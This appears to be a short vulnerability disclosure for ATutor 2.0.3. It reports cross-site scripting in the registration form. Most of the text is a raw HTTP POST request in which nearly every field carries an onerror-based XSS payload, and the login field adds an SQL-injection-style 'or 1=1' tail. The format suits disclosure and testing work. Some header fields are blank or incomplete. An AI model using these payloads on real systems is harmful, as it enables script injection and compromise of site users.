ATutor version 2.0.3 suffers from a cross site scripting vulnerability.
25ed6e587c012b65b116ba47695efccbeb5d93134c0cc3757f392ded9edb4581[ TITLE ....... ][ ATutor
[ DATE ........ ][ .0.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://
[ VERSION ..... ][ 2.0.3
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...
[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)
[--------------------------------------------[
[ 2. What is the type of vulnerability?
[--------------------------------------------[
[ 3. Where is bug :)
................
hard copied from burp:
POST /www/NEW/atutor/ATutor/registration.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/www/NEW/atutor/ATutor/registration.php?register=Register
Cookie: ATutorID=ggobghtrr9dlt3d2qrsrjeej86; ea630b8e07331dfe8176df9908b196be=en-GB; PHPSESSID=rcqn6f0825bopcnfuthkb95la1; docebo_installer=qkel6srpbe1r44falthfgbloi7; docebo_session=au1hlm6k0dj1t72lvl88pdqt31; d5ff290df9b8ab6a17548bbbc48d21bc=903fb97e17f9a31fea5f97ee76a591bf
Content-Type: application/x-www-form-urlencoded
Content-Length: 1605
Connection: close
ml="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&password_error="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&form_password_hidden=923956e1de909d796933df77360069ceaa3df747®istration_token=04bfd37055f6b1b81319dbc326165a78af8a2ba0&login="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e%2F**%2For%2F**%2F1%3D%271%27&form_password1="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&form_password2="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&email="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&private_email="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&email2="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&first_name="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&second_name="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&last_name="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&year="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&month="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&day="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&gender="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&address="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&postal="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&city="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&province="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&country="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&phone="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&website="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&submit=+Save+
.........
[--------------------------------------------[
[ 4. More...
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed